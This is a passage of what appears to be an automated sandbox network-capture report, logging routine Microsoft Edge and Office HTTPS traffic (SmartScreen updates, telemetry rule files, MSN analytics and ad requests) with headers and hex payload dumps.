2024-11-10 03:55:23 UTC	723	OUT	POST /api/browser/edge/data/bloomfilter/x/3 HTTP/1.1 Host: data-edge.smartscreen.microsoft.com Connection: keep-alive Content-Length: 746 Accept: application/octet-stream;application/x-patch-bsdiff; Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiN2w5d1l4b1d4ekNmZnA2VUtZMjVXUT09IiwgImhhc2giOiIzbHR0NFl4dE84MD0ifQ== Content-Type: application/json; charset=utf-8 If-None-Match: "636976985063396749.rel.v2" Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br
2024-11-10 03:55:23 UTC	746	OUT	Data Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
2024-11-10 03:55:24 UTC	248	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:23 GMT Content-Type: application/octet-stream Content-Length: 57 Connection: close Server: Kestrel ETag: "638343870221005468" Request-Context: appId=cid-v1:3d5e3eff-de07-43c3-a15d-06b05ff513c8
2024-11-10 03:55:24 UTC	57	IN	Data Raw: 39 00 00 00 0a 00 00 00 6d 75 72 6d 75 72 33 00 0d 00 00 00 e7 00 00 00 0c 00 00 00 2c 4d f0 68 e4 05 e3 5a 14 87 bb 38 10 5c e2 c4 94 3c 26 4c 69 f1 48 99 f4 5b b2 3f 6d Data Ascii: 9murmur3,MhZ8\<&LiH[?m

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.5	49824	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:24 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 3dd2fc16-001e-0028-2c0b-2fc49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035524Z-17df447cdb56mx55hC1DFWvbt400000005c0000000005164 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:24 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.5	49825	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:24 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 930d6d29-201e-003c-0353-3230f9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035524Z-15869dbbcc6sg5zbhC1DFWy5u800000004500000000033bq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:24 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49831	108.156.245.115	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	925	OUT	GET /b?rn=1731210922530&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1C457A5C69C96D7328066F6F68476CEB&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:24 UTC	955	IN	HTTP/1.1 302 Found Content-Length: 0 Connection: close Date: Sun, 10 Nov 2024 03:55:24 GMT Location: /b2?rn=1731210922530&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1C457A5C69C96D7328066F6F68476CEB&cs_fpit=o&cs_fpdm=null&cs_fpdt=null set-cookie: UID=12E432c46d4b1e2524559821731210924; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000 set-cookie: XID=12E432c46d4b1e2524559821731210924; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000 Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 1e55614427beb2c9a53afc5f91022b80.cloudfront.net (CloudFront) X-Amz-Cf-Pop: DFW56-P5 X-Amz-Cf-Id: LvC0LQIAjfe28mGqYICN_bohe9IRnOr6Fqpz2TqJiu_9ey1z5sP9WQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.5	49826	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:24 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: a6359f23-d01e-0014-2f55-2eed58000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035524Z-17df447cdb56mx55hC1DFWvbt4000000057g00000000h8xd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:24 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.5	49828	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:24 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:24 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: 6164f0e5-d01e-0082-285f-32e489000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035524Z-15869dbbcc65c582hC1DFWgpv400000005s000000000negk x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:24 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.5	49829	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:24 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: c2a9af2b-801e-00ac-2445-32fd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035524Z-17df447cdb5qkskwhC1DFWeeg400000008t0000000001t9y x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:24 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49830	20.125.209.212	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	1175	OUT	GET /c.gif?rnd=1731210922530&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=1b1c38cab0134bc7a8e603f795c6d608&activityId=1b1c38cab0134bc7a8e603f795c6d608&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=1C457A5C69C96D7328066F6F68476CEB; _EDGE_S=F=1&SID=04348CE3E2B16FF0131799D0E3856EA1; _EDGE_V=1
2024-11-10 03:55:24 UTC	1108	IN	HTTP/1.1 302 Redirect Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Location: https://c.bing.com/c.gif?rnd=1731210922530&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=1b1c38cab0134bc7a8e603f795c6d608&activityId=1b1c38cab0134bc7a8e603f795c6d608&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=7D43837CDE984B5C93357FDF0CAA9AAC&RedC=c.msn.com&MXFR=1C457A5C69C96D7328066F6F68476CEB Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=1C457A5C69C96D7328066F6F68476CEB; domain=.msn.com; expires=Fri, 05-Dec-2025 03:55:24 GMT; path=/; SameSite=None; Secure; Priority=High; Date: Sun, 10 Nov 2024 03:55:23 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49832	20.96.153.111	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	1067	OUT	GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=1C457A5C69C96D7328066F6F68476CEB&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=b2252d14d5184741fac3aadb74e7d715 HTTP/1.1 Host: arc.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=1C457A5C69C96D7328066F6F68476CEB; _EDGE_S=F=1&SID=04348CE3E2B16FF0131799D0E3856EA1; _EDGE_V=1
2024-11-10 03:55:24 UTC	674	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 297 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"2,,"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}] Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Allow-Credentials: true X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sun, 10 Nov 2024 03:55:23 GMT Connection: close
2024-11-10 03:55:24 UTC	297	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 38 38 30 30 30 33 30 38 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 4e 5f 70 73 2c 20 45 72 72 6f 72 3a 20 4e 6f 20 65 6c 69 67 69 62 6c 65 20 63 6f 6e 74 65 6e 74 2e 29 2e 22 7d 5d 7d 2c 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 31 30 38 33 37 33 39 33 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 Data Ascii: {"batchrsp":{"ver":"1.0","errors":[{"placement":"88000308","errors":[{"code":2040,"msg":"Demand source returns error (Name: GN_ps, Error: No eligible content.)."}]},{"placement":"10837393","errors":[{"code":2040,"msg":"Demand source returns error (Name: G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49827	20.189.173.17	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	1082	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731210922528&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 3809 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=1C457A5C69C96D7328066F6F68476CEB; _EDGE_S=F=1&SID=04348CE3E2B16FF0131799D0E3856EA1; _EDGE_V=1
2024-11-10 03:55:24 UTC	3809	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 31 30 54 30 33 3a 35 35 3a 32 32 2e 35 32 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 39 38 30 65 34 37 35 2d 63 32 63 32 2d 34 63 31 63 2d 38 36 61 61 2d 30 38 30 38 32 61 34 36 65 62 33 35 22 2c 22 65 70 6f 63 68 22 3a 22 31 35 37 31 32 38 30 32 30 32 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-11-10T03:55:22.524Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"f980e475-c2c2-4c1c-86aa-08082a46eb35","epoch":"1571280202"},"app":{"locale
2024-11-10 03:55:24 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=783e02ced58b4014b6093991d5fbd261&HASH=783e&LV=202411&V=4&LU=1731210924387; Domain=.microsoft.com; Expires=Mon, 10 Nov 2025 03:55:24 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=ba7da64dd18e48fd8e6cf25fc1b259c4; Domain=.microsoft.com; Expires=Sun, 10 Nov 2024 04:25:24 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1859 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Sun, 10 Nov 2024 03:55:24 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49835	13.107.246.57	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
